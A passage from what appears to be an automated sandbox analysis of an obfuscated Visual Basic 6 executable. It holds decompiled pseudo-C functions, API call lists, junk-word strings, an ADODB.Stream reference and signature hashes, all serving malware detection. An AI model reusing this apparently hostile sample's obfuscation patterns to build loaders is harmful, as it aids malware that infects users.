				_v144 = L"Neurolymph";
				_v152 = 8;
				L0040149A();
				_push( &_v88);
				_push( &_v104);
				L004013F8();
				_push( &_v72);
				_t135 =  &_v104;
				_push(_t135);
				L00401410();
				_v164 = _t135;
				_push( &_v104);
				_push( &_v72);
				_push( &_v88);
				_push(3);
				L00401590();
				_t139 = _v164;
				if(_t139 != 0) {
					if( *0x42f414 != 0) {
						_v192 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v192 = 0x42f414;
					}
					_v164 =  *_v192;
					_t166 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v56);
					asm("fclex");
					_v168 = _t166;
					if(_v168 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v164);
						_push(_v168);
						L004015C6();
						_v196 = _t166;
					}
					_v172 = _v56;
					_t171 =  *((intOrPtr*)( *_v172 + 0xd0))(_v172,  &_v52);
					asm("fclex");
					_v176 = _t171;
					if(_v176 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x410170);
						_push(_v172);
						_push(_v176);
						L004015C6();
						_v200 = _t171;
					}
					_t139 = _v52;
					_v188 = _t139;
					_v52 = _v52 & 0x00000000;
					L004015B4();
					L004015C0();
					_push(0x7c);
					L0040144C();
					L004015B4();
				}
				L004015CC();
				_t140 =  &_v56;
				L004015D2();
				_v164 = _t140;
				_t144 =  *((intOrPtr*)( *_v164 + 0x1c))(_v164,  &_v160, _t140, _t139);
				asm("fclex");
				_v168 = _t144;
				if(_v168 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x410130);
					_push(_v164);
					_push(_v168);
					L004015C6();
					_v204 = _t144;
				}
				_v172 =  ~(0 | _v160 == 0x001824b8);
				L004015C0();
				_t148 = _v172;
				if(_t148 != 0) {
					_v64 = 0x67ec26;
					_v72 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v72);
					L004015AE();
					L004015B4();
					L004015A8();
					if( *0x42f414 != 0) {
						_v208 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v208 = 0x42f414;
					}
					_v164 =  *_v208;
					_t155 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v56);
					asm("fclex");
					_v168 = _t155;
					if(_v168 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v164);
						_push(_v168);
						L004015C6();
						_v212 = _t155;
					}
					_v172 = _v56;
					_t160 =  *((intOrPtr*)( *_v172 + 0x78))(_v172,  &_v156);
					asm("fclex");
					_v176 = _t160;
					if(_v176 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x410170);
						_push(_v172);
						_push(_v176);
						L004015C6();
						_v216 = _t160;
					}
					_t148 = _v156;
					_v36 = _t148;
					L004015C0();
				}
				_push(0x42ce7e);
				L00401578();
				L00401578();
				L00401578();
				L00401578();
				L00401578();
				return _t148;
			}

0x0042ca6f
0x0042ca7e
0x0042ca8a
0x0042ca92
0x0042ca95
0x0042ca9c
0x0042caab
0x0042cab4
0x0042cac1
0x0042cac9
0x0042cacc
0x0042cad6
0x0042cade
0x0042cae2
0x0042cae3
0x0042cae8
0x0042caf2
0x0042cb05
0x0042cb0d
0x0042cb11
0x0042cb12
0x0042cb1a
0x0042cb1b
0x0042cb1e
0x0042cb1f
0x0042cb24
0x0042cb2e
0x0042cb32
0x0042cb36
0x0042cb37
0x0042cb39
0x0042cb41
0x0042cb4a
0x0042cb57
0x0042cb74
0x0042cb59
0x0042cb59
0x0042cb5e
0x0042cb63
0x0042cb68
0x0042cb68
0x0042cb86
0x0042cb9e
0x0042cba1
0x0042cba3
0x0042cbb0
0x0042cbd2
0x0042cbb2
0x0042cbb2
0x0042cbb4
0x0042cbb9
0x0042cbbf
0x0042cbc5
0x0042cbca
0x0042cbca
0x0042cbdc
0x0042cbf4
0x0042cbfa
0x0042cbfc
0x0042cc09
0x0042cc2e
0x0042cc0b
0x0042cc0b
0x0042cc10
0x0042cc15
0x0042cc1b
0x0042cc21
0x0042cc26
0x0042cc26
0x0042cc35
0x0042cc38
0x0042cc3e
0x0042cc4b
0x0042cc53
0x0042cc58
0x0042cc5a
0x0042cc64
0x0042cc64
0x0042cc69
0x0042cc6f
0x0042cc73
0x0042cc78
0x0042cc93
0x0042cc96
0x0042cc98
0x0042cca5
0x0042ccc7
0x0042cca7
0x0042cca7
0x0042cca9
0x0042ccae
0x0042ccb4
0x0042ccba
0x0042ccbf
0x0042ccbf
0x0042ccdf
0x0042cce9
0x0042ccee
0x0042ccf7
0x0042ccfd
0x0042cd04
0x0042cd0b
0x0042cd0d
0x0042cd0f
0x0042cd11
0x0042cd16
0x0042cd17
0x0042cd21
0x0042cd29
0x0042cd35
0x0042cd52
0x0042cd37
0x0042cd37
0x0042cd3c
0x0042cd41
0x0042cd46
0x0042cd46
0x0042cd64
0x0042cd7c
0x0042cd7f
0x0042cd81
0x0042cd8e
0x0042cdb0
0x0042cd90
0x0042cd90
0x0042cd92
0x0042cd97
0x0042cd9d
0x0042cda3
0x0042cda8
0x0042cda8
0x0042cdba
0x0042cdd5
0x0042cdd8
0x0042cdda
0x0042cde7
0x0042ce09
0x0042cde9
0x0042cde9
0x0042cdeb
0x0042cdf0
0x0042cdf6
0x0042cdfc
0x0042ce01
0x0042ce01
0x0042ce10
0x0042ce17
0x0042ce1e
0x0042ce1e
0x0042ce23
0x0042ce58
0x0042ce60
0x0042ce68
0x0042ce70
0x0042ce78
0x0042ce7d

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042CA8A
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042CAB4
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042CAC1
#515.MSVBVM60(?,00004008,00000047), ref: 0042CAE3
__vbaVarDup.MSVBVM60(?,00004008,00000047), ref: 0042CB05
#518.MSVBVM60(?,?,?,00004008,00000047), ref: 0042CB12
__vbaVarTstNe.MSVBVM60(?,?,?,?,?,00004008,00000047), ref: 0042CB1F
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00004008,00000047), ref: 0042CB39
__vbaNew2.MSVBVM60(00410160,0042F414,?,?,?,00401326), ref: 0042CB63
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042CBC5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,000000D0), ref: 0042CC21
__vbaStr.MSVBVM60(00000000,?,00410170,000000D0), ref: 0042CC4B
#537.MSVBVM60(0000007C), ref: 0042CC5A
__vbaStr.MSVBVM60(0000007C), ref: 0042CC64
#685.MSVBVM60(?,?,?,00401326), ref: 0042CC69
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,00401326), ref: 0042CC73
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410130,0000001C), ref: 0042CCBA
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042CD17
__vbaStr.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042CD21
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042CD29
__vbaNew2.MSVBVM60(00410160,0042F414,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042CD41
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042CDA3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000078), ref: 0042CDFC

Strings

Inddmmes7, xrefs: 0042CAB9
&g, xrefs: 0042CCFD
Neurolymph, xrefs: 0042CAE8

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$CopyFreeNew2$#515#518#537#685#704ChkstkList
String ID: &g$Inddmmes7$Neurolymph
API String ID: 120823666-3662811303
Opcode ID: ab6192057c61f5d95381c6724475fd77be2fafaea760f7cc69623d59d6bed872
Instruction ID: 293363e3046be1ce8bfb8d583f0da26273a7f9bc6a8b00c9308ba2bf4b1e167c
Opcode Fuzzy Hash: ab6192057c61f5d95381c6724475fd77be2fafaea760f7cc69623d59d6bed872
Instruction Fuzzy Hash: D3B11870A00228EFDB20EF91DD45BDEB7B4BF05304F5041AAE109BB1A1DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C6D4, Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042C6D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				signed int _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				char _v136;
				short _v188;
				signed int _v212;
				short _t140;
				char* _t147;
				char* _t149;
				intOrPtr _t155;
				intOrPtr _t164;
				void* _t191;
				void* _t193;
				void* _t195;
				void* _t200;
				void* _t202;
				void* _t204;
				void* _t206;
				void* _t210;
				void* _t212;
				void* _t216;
				void* _t218;
				long long* _t219;

				_t219 = _t218 - 0x18;
				 *[fs:0x0] = _t219;
				L00401320();
				_v28 = _t219;
				_v24 = 0x401248;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401326, _t216);
				_v8 = 1;
				_v8 = 2;
				 *_t219 =  *0x4012c8;
				L00401428();
				L0040142E();
				asm("fcomp qword [0x4012c0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004015D8();
					_v8 = 4;
					_push(0);
					_push(9);
					_push(1);
					_push(3);
					_push( &_v48);
					_push(4);
					_push(0x80);
					L00401422();
					_t219 = _t219 + 0x1c;
					_v8 = 5;
					_t155 =  *((intOrPtr*)(_v48 + 0xc));
					 *((intOrPtr*)(_t155 + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x43775c;
					_v8 = 6;
					_push(0x80);
					_push(0xfa);
					_push(0x79);
					L004015BA();
					_t210 = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t210 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t155;
					_v8 = 7;
					_t191 = 2;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t191 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0xe1628;
					_v8 = 8;
					_t193 = 3;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t193 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x149800;
					_v8 = 9;
					_t195 = 4;
					_t164 =  *((intOrPtr*)(_v48 + 0xc));
					 *((intOrPtr*)(_t164 + (_t195 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x6e0fe2;
					_v8 = 0xa;
					_push(L"Vivification");
					L0040141C();
					_t212 = 5;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t212 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t164;
					_v8 = 0xb;
					_t200 = 6;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t200 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x1516ac;
					_v8 = 0xc;
					_t202 = 7;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t202 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0xfca3a;
					_v8 = 0xd;
					_t204 = 8;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t204 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x321e1b;
					_v8 = 0xe;
					_t206 = 9;
					 *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xc)) + (_t206 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x593ff4;
				}
				_v8 = 0x10;
				_v64 = 0x82ab25;
				_v72 = 3;
				_push( &_v72);
				L00401416();
				L004015B4();
				_v96 = 0xce;
				_v104 = 2;
				_v212 = _v56;
				_v56 = _v56 & 0x00000000;
				_v80 = _v212;
				_v88 = 8;
				_push( &_v104);
				_push(0xc0);
				_push( &_v88);
				_push( &_v120);
				L0040140A();
				_push(0x5b0);
				_push( &_v136);
				L00401404();
				_push( &_v120);
				_t140 =  &_v136;
				_push(_t140);
				L00401410();
				_v188 = _t140;
				L00401578();
				_push( &_v136);
				_push( &_v120);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(5);
				L00401590();
				if(_v188 != 0) {
					_v8 = 0x11;
					_push(0);
					_push(L"ADODB.Stream");
					_push( &_v72);
					L00401566();
					_t149 =  &_v72;
					_push(_t149);
					L0040156C();
					_push(_t149);
					_push( &_v52);
					L00401572();
					L004015A8();
					_v8 = 0x12;
					_v64 = 0x33e8a2;
					_v72 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v72);
					L004015AE();
					L004015B4();
					L004015A8();
				}
				_v8 = 0x14;
				_v44 = 0x8422a9;
				asm("wait");
				_push(0x42ca45);
				L00401578();
				_t147 =  &_v48;
				_push(_t147);
				_push(0);
				L004013FE();
				L004015C0();
				return _t147;
			}

0x0042c6d7
0x0042c6e6
0x0042c6f2
0x0042c6fa
0x0042c6fd
0x0042c704
0x0042c70b
0x0042c71a
0x0042c71d
0x0042c724
0x0042c733
0x0042c736
0x0042c73b
0x0042c740
0x0042c746
0x0042c748
0x0042c749
0x0042c74f
0x0042c756
0x0042c758
0x0042c75d
0x0042c764
0x0042c766
0x0042c768
0x0042c76a
0x0042c76f
0x0042c770
0x0042c772
0x0042c777
0x0042c77c
0x0042c77f
0x0042c791
0x0042c794
0x0042c79b
0x0042c7a2
0x0042c7a7
0x0042c7ac
0x0042c7ae
0x0042c7b8
0x0042c7c2
0x0042c7c5
0x0042c7d1
0x0042c7db
0x0042c7e2
0x0042c7ee
0x0042c7f8
0x0042c7ff
0x0042c80b
0x0042c812
0x0042c815
0x0042c81c
0x0042c823
0x0042c828
0x0042c832
0x0042c83c
0x0042c83f
0x0042c84b
0x0042c855
0x0042c85c
0x0042c868
0x0042c872
0x0042c879
0x0042c885
0x0042c88f
0x0042c896
0x0042c8a2
0x0042c8ac
0x0042c8ac
0x0042c8b3
0x0042c8ba
0x0042c8c1
0x0042c8cb
0x0042c8cc
0x0042c8d6
0x0042c8db
0x0042c8e2
0x0042c8ec
0x0042c8f2
0x0042c8fc
0x0042c8ff
0x0042c909
0x0042c90a
0x0042c912
0x0042c916
0x0042c917
0x0042c91c
0x0042c927
0x0042c928
0x0042c930
0x0042c931
0x0042c937
0x0042c938
0x0042c93d
0x0042c947
0x0042c952
0x0042c956
0x0042c95a
0x0042c95e
0x0042c962
0x0042c963
0x0042c965
0x0042c976
0x0042c978
0x0042c97f
0x0042c981
0x0042c989
0x0042c98a
0x0042c98f
0x0042c992
0x0042c993
0x0042c998
0x0042c99c
0x0042c99d
0x0042c9a5
0x0042c9aa
0x0042c9b1
0x0042c9b8
0x0042c9bf
0x0042c9c1
0x0042c9c3
0x0042c9c5
0x0042c9ca
0x0042c9cb
0x0042c9d5
0x0042c9dd
0x0042c9dd
0x0042c9e2
0x0042c9e9
0x0042c9f0
0x0042c9f1
0x0042ca2c
0x0042ca31
0x0042ca34
0x0042ca35
0x0042ca37
0x0042ca3f
0x0042ca44

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042C6F2
#614.MSVBVM60(?,?,?,?,?,?,00401326), ref: 0042C736
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401326), ref: 0042C73B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401326), ref: 0042C758
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,00000009,00000000,000000FF,?,?,?,?,?,?,00401326), ref: 0042C777
#588.MSVBVM60(00000079,000000FA,00000080,?,?,?,?,?,?,00401326), ref: 0042C7AE
__vbaLenBstr.MSVBVM60(Vivification,00000079,000000FA,00000080,?,?,?,?,?,?,00401326), ref: 0042C828
#536.MSVBVM60(00000003), ref: 0042C8CC
__vbaStr.MSVBVM60(00000003), ref: 0042C8D6
#629.MSVBVM60(?,00000008,000000C0,00000002,?,?,?,?,?,?,?,00000003), ref: 0042C917
#698.MSVBVM60(?,000005B0,?,00000008,000000C0,00000002,?,?,?,?,?,?,?,00000003), ref: 0042C928
__vbaVarTstNe.MSVBVM60(?,?,?,000005B0,?,00000008,000000C0,00000002,?,?,?,?,?,?,?,00000003), ref: 0042C938
__vbaFreeVarList.MSVBVM60(00000005,00000003,00000008,00000002,?,?,?,?,?,000005B0,?,00000008,000000C0,00000002), ref: 0042C965
#716.MSVBVM60(?,ADODB.Stream,00000000,?,?,?,?,?,00401326), ref: 0042C98A
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000,?,?,?,?,?,00401326), ref: 0042C993
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,00401326), ref: 0042C99D
__vbaFreeVar.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,00401326), ref: 0042C9A5
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?), ref: 0042C9CB
__vbaStr.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?), ref: 0042C9D5
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?), ref: 0042C9DD
__vbaAryDestruct.MSVBVM60(00000000,?,0042CA45), ref: 0042CA37

Strings

Vivification, xrefs: 0042C823
ADODB.Stream, xrefs: 0042C981

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536#588#614#629#698#704#716AddrefBstrChkstkDestructErrorListRedim
String ID: ADODB.Stream$Vivification
API String ID: 758249574-188412630
Opcode ID: 66172045c3eecdfdb1c386f4862ee91cb315b69fa440672dfa84b4be1cf09d0a
Instruction ID: 8d3b1227cd751321b1ef6eb33d83b8fbc543de524a784823eecfb03d17b4d7e2
Opcode Fuzzy Hash: 66172045c3eecdfdb1c386f4862ee91cb315b69fa440672dfa84b4be1cf09d0a
Instruction Fuzzy Hash: CAA1E8B5D00208AFDB14DFA4D985FDDBBB4EB08314F11815AE911BB2E1DB79AA04CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042CE9D, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042CE9D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16, signed int* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				signed int _t72;
				char* _t78;
				signed int _t84;
				signed int _t89;
				void* _t117;
				void* _t119;
				intOrPtr _t120;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				L00401320();
				_v16 = _t120;
				_v12 = 0x4012e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401326, _t117);
				L0040158A();
				 *_a24 =  *_a24 & 0x00000000;
				_push(0x1f);
				L00401536();
				L004015B4();
				_v64 = 0x5f76c5;
				_v72 = 3;
				_t72 =  &_v72;
				_push(_t72);
				L004014DC();
				L004015B4();
				_push(_t72);
				_push(L"Iodothyrin7");
				L004013F2();
				L004015B4();
				_push(_t72);
				L00401584();
				asm("sbb eax, eax");
				_v112 =  ~( ~_t72 + 1);
				_push( &_v52);
				_push( &_v48);
				_push(2);
				L00401542();
				L004015A8();
				_t78 = _v112;
				if(_t78 != 0) {
					if( *0x42f414 != 0) {
						_v136 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v136 = 0x42f414;
					}
					_v112 =  *_v136;
					_t84 =  *((intOrPtr*)( *_v112 + 0x14))(_v112,  &_v56);
					asm("fclex");
					_v116 = _t84;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v112);
						_push(_v116);
						L004015C6();
						_v140 = _t84;
					}
					_v120 = _v56;
					_t89 =  *((intOrPtr*)( *_v120 + 0x70))(_v120,  &_v108);
					asm("fclex");
					_v124 = _t89;
					if(_v124 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x410170);
						_push(_v120);
						_push(_v124);
						L004015C6();
						_v144 = _t89;
					}
					_v32 = _v108;
					L004015C0();
					_v96 = L"Prevaricator";
					_v104 = 8;
					L0040149A();
					_push( &_v72);
					_push( &_v88);
					L004013EC();
					_push( &_v88);
					L00401560();
					L004015B4();
					_push( &_v88);
					_t78 =  &_v72;
					_push(_t78);
					_push(2);
					L00401590();
				}
				L0040158A();
				_push(0x42d0e8);
				L00401578();
				L00401578();
				L00401578();
				return _t78;
			}

0x0042cea0
0x0042ceaf
0x0042ceb9
0x0042cec1
0x0042cec4
0x0042cecb
0x0042ceda
0x0042cee3
0x0042ceeb
0x0042ceee
0x0042cef0
0x0042cefa
0x0042ceff
0x0042cf06
0x0042cf0d
0x0042cf10
0x0042cf11
0x0042cf1b
0x0042cf20
0x0042cf21
0x0042cf26
0x0042cf30
0x0042cf35
0x0042cf36
0x0042cf3d
0x0042cf42
0x0042cf49
0x0042cf4d
0x0042cf4e
0x0042cf50
0x0042cf5b
0x0042cf60
0x0042cf66
0x0042cf73
0x0042cf90
0x0042cf75
0x0042cf75
0x0042cf7a
0x0042cf7f
0x0042cf84
0x0042cf84
0x0042cfa2
0x0042cfb1
0x0042cfb4
0x0042cfb6
0x0042cfbd
0x0042cfd9
0x0042cfbf
0x0042cfbf
0x0042cfc1
0x0042cfc6
0x0042cfc9
0x0042cfcc
0x0042cfd1
0x0042cfd1
0x0042cfe3
0x0042cff2
0x0042cff5
0x0042cff7
0x0042cffe
0x0042d01a
0x0042d000
0x0042d000
0x0042d002
0x0042d007
0x0042d00a
0x0042d00d
0x0042d012
0x0042d012
0x0042d025
0x0042d02c
0x0042d031
0x0042d038
0x0042d045
0x0042d04d
0x0042d051
0x0042d052
0x0042d05a
0x0042d05b
0x0042d065
0x0042d06d
0x0042d06e
0x0042d071
0x0042d072
0x0042d074
0x0042d079
0x0042d084
0x0042d089
0x0042d0d2
0x0042d0da
0x0042d0e2
0x0042d0e7

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042CEB9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042CEE3
#525.MSVBVM60(0000001F,?,?,?,?,00401326), ref: 0042CEF0
__vbaStr.MSVBVM60(0000001F,?,?,?,?,00401326), ref: 0042CEFA
#574.MSVBVM60(00000003), ref: 0042CF11
__vbaStr.MSVBVM60(00000003), ref: 0042CF1B
#519.MSVBVM60(Iodothyrin7,00000000,00000003), ref: 0042CF26
__vbaStr.MSVBVM60(Iodothyrin7,00000000,00000003), ref: 0042CF30
__vbaStrCmp.MSVBVM60(00000000,Iodothyrin7,00000000,00000003), ref: 0042CF36
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,Iodothyrin7,00000000,00000003), ref: 0042CF50
__vbaFreeVar.MSVBVM60(?,?,00401326), ref: 0042CF5B
__vbaNew2.MSVBVM60(00410160,0042F414,?,?,00401326), ref: 0042CF7F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042CFCC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000070), ref: 0042D00D
__vbaVarDup.MSVBVM60(00000000,?,00410170,00000070), ref: 0042D045
#522.MSVBVM60(?,?), ref: 0042D052
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0042D05B
__vbaStr.MSVBVM60(?,?,?), ref: 0042D065
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0042D074
__vbaStrCopy.MSVBVM60(?,?,00401326), ref: 0042D084

Strings

Iodothyrin7, xrefs: 0042CF21
Prevaricator, xrefs: 0042D031
Onionlike6, xrefs: 0042D07C

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyHresultList$#519#522#525#574ChkstkMoveNew2
String ID: Iodothyrin7$Onionlike6$Prevaricator
API String ID: 3691652042-3040718462
Opcode ID: 493b6745e27ecda5ffbc8fd4fe5f8c5a833bc38d929ce06049e9f651119867e4
Instruction ID: 27e1c3a5906d3f67852e788daea53c1621d4992ed957e8658ea879076914dc0b
Opcode Fuzzy Hash: 493b6745e27ecda5ffbc8fd4fe5f8c5a833bc38d929ce06049e9f651119867e4
Instruction Fuzzy Hash: C551FA71D00218AFDB10EFA1D946BDEB7B8AF44304F60416AF406BB1A1DB789A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042D6EE, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E0042D6EE(intOrPtr _a4, char _a8) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed short _v16;
				signed int _v20;
				void* _v40;
				short _t37;
				void* _t39;
				signed short _t51;
				void* _t62;
				signed int _t64;
				char _t66;
				signed int _t79;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_t37 =  *0x42f044;
				if(_t37 == 0) {
					return _t37;
				} else {
					_t39 = _a4 -  *0x42f040;
					if(_t39 >= 0) {
						_t86 =  *0x42f034; // 0x605420
						 *((char*)(_t86 + _t39)) = _a8;
						return _t39;
					}
					L004014BE();
					_t94 = _t98;
					_push(8);
					L00401320();
					if( *0x42f044 == 0) {
						L8:
						return _v12;
					} else {
						_v16 = E0042D947(_v0);
						_t45 = _v0 + 2;
						if(_v0 + 2 < 0) {
							L004014BE();
							_push(_t94);
							_t95 = _t98;
							_push(4);
							L00401320();
							if((_v0 & 0x80) == 0) {
								_t51 = (_v0 & 0x000000ff) * 0x100;
								if(_t51 < 0) {
									goto L16;
								} else {
									_v16 = _t51 | _v4 & 0x000000ff;
									goto L15;
								}
							} else {
								if((_v0 & 0x000000ff) * 0x100 < 0) {
									L16:
									L004014BE();
									_push(_t95);
									_t96 = _t98;
									_push(4);
									L00401320();
									if((_v4 & 0x00008000) == 0) {
										_t56 = _v4 & 0x0000ffff;
										_v20 = _v4 & 0x0000ffff;
									} else {
										_t56 = _v4 | 0xffff0000;
										_v20 = _v4 | 0xffff0000;
									}
									L004015E4();
									E0042D886(_v8, _t56);
									asm("cdq");
									L004015E4();
									_push((_v4 & 0xffff0000) / 0x10000);
									_t62 = _v8 + 2;
									if(_t62 < 0) {
										L004014BE();
										_push(_t96);
										_t97 = _t98;
										_push(4);
										L00401320();
										_t64 = 1;
										_t79 = 1;
										_t88 =  *0x42f034; // 0x605420
										_t91 =  *0x42f034; // 0x605420
										_t66 =  *((intOrPtr*)(_t91 + _t64 * 0xffffffff));
										 *((char*)(_t88 + _t79 * 0xffffffff)) = _t66;
										_push( *0x42f034);
										L004013B6();
										 *0x42f040 = _t66;
										 *(_t97 - 4) =  *(_t97 - 4) | 0x0000ffff;
										 *0x42f044 =  *(_t97 - 4);
										return  *(_t97 - 4);
									} else {
										_push(_t62);
										return E0042D886();
									}
								} else {
									L004015E4();
									_v16 = _v4 & 0x000000ff;
									L15:
									return _v16;
								}
							}
						} else {
							_push(E0042D947(_t45));
							_v12 = E0042D8DC(_v16);
							goto L8;
						}
					}
				}
			}

0x0042d6f1
0x0042d6fa
0x0042d714
0x0042d6fc
0x0042d6ff
0x0042d705
0x0042d707
0x0042d710
0x00000000
0x0042d710
0x0042d717
0x0042d71d
0x0042d71f
0x0042d722
0x0042d730
0x0042d758
0x0042d75c
0x0042d732
0x0042d73a
0x0042d741
0x0042d744
0x0042d75f
0x0042d764
0x0042d765
0x0042d767
0x0042d76a
0x0042d77d
0x0042d7a7
0x0042d7ac
0x00000000
0x0042d7ae
0x0042d7b6
0x00000000
0x0042d7b6
0x0042d77f
